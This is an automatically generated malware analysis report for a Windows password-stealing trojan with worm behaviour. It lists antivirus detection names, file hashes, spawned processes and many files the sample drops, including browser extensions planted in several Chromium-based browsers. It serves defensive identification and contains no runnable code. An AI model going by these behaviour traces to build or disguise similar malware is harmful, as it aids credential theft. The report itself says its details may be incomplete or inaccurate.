Gen.Variant.Zusy.206436_a1bbca8139

by malwarelabrobot on January 10th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.206436 (B) (Emsisoft), Gen:Variant.Zusy.206436 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: a1bbca8139bdabe892df787bea434c33
SHA1: e8042c20f5bb729788169526aeb593c0b7fbe6a7
SHA256: 0b14af2ff95be8854ecc788c951e747b3cacbf1a45e64d8c0c28a25bbc528c84
SSDeep: 98304:spdtSgDeSy0mrIgH4xxX2Etg69BEKzgXzu15:Zrz4xxZg6PkXzm
Size: 3493888 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftWindowsShortcutfile, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2016-12-06 17:56:49
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-PSW. Trojan program intended for stealing users passwords.

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):

HC188.exe:2748
WScript.exe:2632
src2011.tmp:372
src2011.exe:3732
bFuAq.exe:3352
1819.exe:3564
rundll32.exe:3404
mm.exe:2712
regsvr32.exe:2260
mmc.exe:3368
guide.exe:2532
guide.exe:672
otqvyruekg.exe:3296

The Trojan injects its code into the following process(es):

%original file name%.exe:2180

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process HC188.exe:2748 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\1819.exe (50 bytes)
C:\Windows\mm.exe (299 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\hyaz2_Y_10031[1].exe (28065 bytes)
C:\Windows\src2011.exe (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\src2011[1].exe (565882 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\yy[1].txt (301 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\1819[1].exe (527707 bytes)

The process WScript.exe:2632 makes changes in the file system.
The Trojan deletes the following file(s):

C:\Windows\1819.exe (0 bytes)
C:\Windows\tem.vbs (0 bytes)

The process src2011.tmp:372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-B9OOF.tmp (1281 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-MF5A3.tmp (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\xmlconfig\is-RP6UK.tmp (663 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\is-19N56.tmp (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-460JK.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-FVIO4.tmp (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-2MIAD.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-IADDD.tmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\is-NICJE.tmp (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-HVUIH.tmp (2105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-T9LKT.tmp (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-3KJB6.tmp (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-J5JMM.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-CAITJ.tmp (13800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-G6L66.tmp (2321 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-2VABS.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-B8MLT.tmp (4185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-065I6.tmp (57 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-A0FE6.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-9S1N0.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp\ISTask.dll (687 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\chromeNativeClient\is-G7L8O.tmp (2105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-IK8SG.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-7F8IN.tmp (3361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-PBIU3.tmp (2321 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-LF318.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-8PHSQ.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-5ICHK.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-20378.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-LUS01.tmp (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-CTN93.tmp (3361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-RPA16.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-UL91T.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.d (438 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-T50I1.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-BHK2S.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp\_isetup\_shfoldr.dll (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-4EB2H.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-7ON68.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-PEBLC.tmp (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-0PTE5.tmp (88 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\chromeNativeClient\is-SM9S4.tmp (412 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\is-RVOIL.tmp (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-8NQQU.tmp (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-SMSJL.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-ULD5Q.tmp (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-L3U6R.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\is-4Q56G.tmp (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-9FV32.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-7LBB8.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-SIFLR.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-6SUBS.tmp (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-9G0BA.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-R6SC4.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-9T08E.tmp (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-UBRU8.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\xmlconfig\is-EPA69.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-K9B92.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-C1SG6.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyueservice.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-TO7V8.tmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-AGEEL.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-A35DN.tmp (2 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp\ISTask.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp\_isetup\_shfoldr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp (0 bytes)

The process src2011.exe:3732 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-4SP61.tmp\src2011.tmp (1423 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-4SP61.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-4SP61.tmp\src2011.tmp (0 bytes)

The process bFuAq.exe:3352 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\onest.txt (1 bytes)
C:\Windows\Report.log (7 bytes)

The process 1819.exe:3564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Media\McIe.wav (17 bytes)
C:\Windows\Media\Mcfg.wav (1 bytes)
C:\Windows\tAzJsX\27e.exe (108 bytes)
C:\Windows\tAzJsX\bFuAq.exe (218 bytes)
C:\Windows\tAzJsX\Dqc.exe (108 bytes)
C:\Windows\tAzJsX\G57.exe (108 bytes)
C:\Windows\tAzJsX\BPp.exe (108 bytes)
C:\Windows\onest.txt (1 bytes)
C:\Windows\tAzJsX\PTR.exe (108 bytes)
C:\Windows\Media\hd.wav (1 bytes)
C:\Windows\mcconfig.dat (2 bytes)
C:\Windows\pcq.exe (108 bytes)
C:\Windows\tAzJsX\LiveUDHelper.dll (1 bytes)
C:\Windows\tAzJsX\drH.exe (108 bytes)
C:\Windows\tAzJsX\MIJ.exe (108 bytes)
C:\Windows\tem.vbs (169 bytes)

The process rundll32.exe:3404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games\Steam Dark Messiah Might and Magic Single Playerâ„¢.lnk (280 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B912B2C6928A18B8CD7D50CF08BEA95B_481E03432F6D1AE9D28AB3294512C01D (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\GameExplorer\{98A0A23D-0A5F-4D35-9D4A-DAF2B7F0CF43}\PlayTasks\0\Play.lnk (756 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab6344.tmp (51 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DAF2884EC4DFA96BA4A58D4DBC9C406 (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar6345.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B912B2C6928A18B8CD7D50CF08BEA95B_481E03432F6D1AE9D28AB3294512C01D (1848 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DAF2884EC4DFA96BA4A58D4DBC9C406 (804 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar6345.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab6344.tmp (0 bytes)

The process mm.exe:2712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\WindowsUpdate\otqvyruekg.exe (47523 bytes)

The process %original file name%.exe:2180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\HC188.exe (1522 bytes)

The process mmc.exe:3368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\st.dat (75 bytes)
C:\Windows\Media\[i1HKe].mp3 (1 bytes)
C:\Windows\star.dat (44 bytes)
C:\Windows\webpid.txt (4 bytes)

The process guide.exe:2532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\res\crx.png (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
%Program Files%\Google\Chrome\Application\54.0.2840.59\resources.pak (597622 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\cupdate.dat (157 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (8273 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_metadata\computed_hashes.json (1060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (88 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\jyrl\config\rili.ini (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_remove\res\crx.png (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fe2c\jyrili.exe (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\_metadata\computed_hashes.json (1060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_create\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\UCBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Tencent\QQBrowser\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\7zxr.dll (18123 bytes)
